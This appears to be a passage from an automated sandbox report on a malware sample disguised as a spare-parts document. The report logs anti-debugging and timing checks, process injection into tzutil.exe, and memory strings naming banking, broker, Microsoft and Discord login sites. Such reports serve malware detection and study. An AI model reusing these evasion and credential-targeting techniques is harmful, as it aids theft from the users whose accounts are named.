                      Source: C:\Windows\SysWOW64\tzutil.exe TID: 8124Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00ABC9D0 FindFirstFileW,FindNextFileW,FindClose,9_2_00ABC9D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: UQ63g7r-.9.drBinary or memory string: dev.azure.comVMware20,11696497155j
                      Source: UQ63g7r-.9.drBinary or memory string: global block list test formVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                      Source: UQ63g7r-.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                      Source: UQ63g7r-.9.drBinary or memory string: tasks.office.comVMware20,11696497155o
                      Source: UQ63g7r-.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2602795351.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2247250261.000001943ADDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: UQ63g7r-.9.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                      Source: UQ63g7r-.9.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                      Source: UQ63g7r-.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                      Source: UQ63g7r-.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                      Source: UQ63g7r-.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: AMC password management pageVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                      Source: UQ63g7r-.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                      Source: UQ63g7r-.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                      Source: UQ63g7r-.9.drBinary or memory string: discord.comVMware20,11696497155f
                      Source: UQ63g7r-.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                      Source: UQ63g7r-.9.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                      Source: UQ63g7r-.9.drBinary or memory string: outlook.office.comVMware20,11696497155s
                      Source: UQ63g7r-.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                      Source: UQ63g7r-.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                      Source: UQ63g7r-.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07310007 rdtsc 0_2_07310007
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00417B63 LdrLoadDll,4_2_00417B63
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov ecx, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov ecx, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov ecx, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov ecx, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01250115 mov eax, dword ptr fs:[00000030h]4_2_01250115
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C0124 mov eax, dword ptr fs:[00000030h]4_2_011C0124
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123A118 mov ecx, dword ptr fs:[00000030h]4_2_0123A118
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123A118 mov eax, dword ptr fs:[00000030h]4_2_0123A118
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123A118 mov eax, dword ptr fs:[00000030h]4_2_0123A118
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123A118 mov eax, dword ptr fs:[00000030h]4_2_0123A118
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196154 mov eax, dword ptr fs:[00000030h]4_2_01196154
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196154 mov eax, dword ptr fs:[00000030h]4_2_01196154
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118C156 mov eax, dword ptr fs:[00000030h]4_2_0118C156
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01224144 mov eax, dword ptr fs:[00000030h]4_2_01224144
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01224144 mov eax, dword ptr fs:[00000030h]4_2_01224144
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01224144 mov ecx, dword ptr fs:[00000030h]4_2_01224144
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01224144 mov eax, dword ptr fs:[00000030h]4_2_01224144
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01224144 mov eax, dword ptr fs:[00000030h]4_2_01224144
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01228158 mov eax, dword ptr fs:[00000030h]4_2_01228158
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118A197 mov eax, dword ptr fs:[00000030h]4_2_0118A197
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118A197 mov eax, dword ptr fs:[00000030h]4_2_0118A197
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118A197 mov eax, dword ptr fs:[00000030h]4_2_0118A197
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D0185 mov eax, dword ptr fs:[00000030h]4_2_011D0185
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01234180 mov eax, dword ptr fs:[00000030h]4_2_01234180
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01234180 mov eax, dword ptr fs:[00000030h]4_2_01234180
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124C188 mov eax, dword ptr fs:[00000030h]4_2_0124C188
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124C188 mov eax, dword ptr fs:[00000030h]4_2_0124C188
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121019F mov eax, dword ptr fs:[00000030h]4_2_0121019F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121019F mov eax, dword ptr fs:[00000030h]4_2_0121019F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121019F mov eax, dword ptr fs:[00000030h]4_2_0121019F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121019F mov eax, dword ptr fs:[00000030h]4_2_0121019F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012661E5 mov eax, dword ptr fs:[00000030h]4_2_012661E5
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C01F8 mov eax, dword ptr fs:[00000030h]4_2_011C01F8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012561C3 mov eax, dword ptr fs:[00000030h]4_2_012561C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012561C3 mov eax, dword ptr fs:[00000030h]4_2_012561C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E1D0 mov eax, dword ptr fs:[00000030h]4_2_0120E1D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E1D0 mov eax, dword ptr fs:[00000030h]4_2_0120E1D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0120E1D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E1D0 mov eax, dword ptr fs:[00000030h]4_2_0120E1D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E1D0 mov eax, dword ptr fs:[00000030h]4_2_0120E1D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE016 mov eax, dword ptr fs:[00000030h]4_2_011AE016
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE016 mov eax, dword ptr fs:[00000030h]4_2_011AE016
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE016 mov eax, dword ptr fs:[00000030h]4_2_011AE016
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE016 mov eax, dword ptr fs:[00000030h]4_2_011AE016
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01226030 mov eax, dword ptr fs:[00000030h]4_2_01226030
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01214000 mov ecx, dword ptr fs:[00000030h]4_2_01214000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118A020 mov eax, dword ptr fs:[00000030h]4_2_0118A020
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118C020 mov eax, dword ptr fs:[00000030h]4_2_0118C020
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01192050 mov eax, dword ptr fs:[00000030h]4_2_01192050
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BC073 mov eax, dword ptr fs:[00000030h]4_2_011BC073
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01216050 mov eax, dword ptr fs:[00000030h]4_2_01216050
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012280A8 mov eax, dword ptr fs:[00000030h]4_2_012280A8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119208A mov eax, dword ptr fs:[00000030h]4_2_0119208A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012560B8 mov eax, dword ptr fs:[00000030h]4_2_012560B8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012560B8 mov ecx, dword ptr fs:[00000030h]4_2_012560B8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012160E0 mov eax, dword ptr fs:[00000030h]4_2_012160E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118C0F0 mov eax, dword ptr fs:[00000030h]4_2_0118C0F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D20F0 mov ecx, dword ptr fs:[00000030h]4_2_011D20F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011980E9 mov eax, dword ptr fs:[00000030h]4_2_011980E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0118A0E3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012120DE mov eax, dword ptr fs:[00000030h]4_2_012120DE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118C310 mov ecx, dword ptr fs:[00000030h]4_2_0118C310
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B0310 mov ecx, dword ptr fs:[00000030h]4_2_011B0310
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA30B mov eax, dword ptr fs:[00000030h]4_2_011CA30B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA30B mov eax, dword ptr fs:[00000030h]4_2_011CA30B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA30B mov eax, dword ptr fs:[00000030h]4_2_011CA30B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123437C mov eax, dword ptr fs:[00000030h]4_2_0123437C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01238350 mov ecx, dword ptr fs:[00000030h]4_2_01238350
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125A352 mov eax, dword ptr fs:[00000030h]4_2_0125A352
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov ecx, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01188397 mov eax, dword ptr fs:[00000030h]4_2_01188397
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01188397 mov eax, dword ptr fs:[00000030h]4_2_01188397
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01188397 mov eax, dword ptr fs:[00000030h]4_2_01188397
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118E388 mov eax, dword ptr fs:[00000030h]4_2_0118E388
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118E388 mov eax, dword ptr fs:[00000030h]4_2_0118E388
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118E388 mov eax, dword ptr fs:[00000030h]4_2_0118E388
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B438F mov eax, dword ptr fs:[00000030h]4_2_011B438F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B438F mov eax, dword ptr fs:[00000030h]4_2_011B438F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]4_2_011983C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]4_2_011983C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]4_2_011983C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]4_2_011983C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012163C0 mov eax, dword ptr fs:[00000030h]4_2_012163C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C63FF mov eax, dword ptr fs:[00000030h]4_2_011C63FF
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124C3CD mov eax, dword ptr fs:[00000030h]4_2_0124C3CD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE3F0 mov eax, dword ptr fs:[00000030h]4_2_011AE3F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE3F0 mov eax, dword ptr fs:[00000030h]4_2_011AE3F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE3F0 mov eax, dword ptr fs:[00000030h]4_2_011AE3F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]4_2_011A03E9
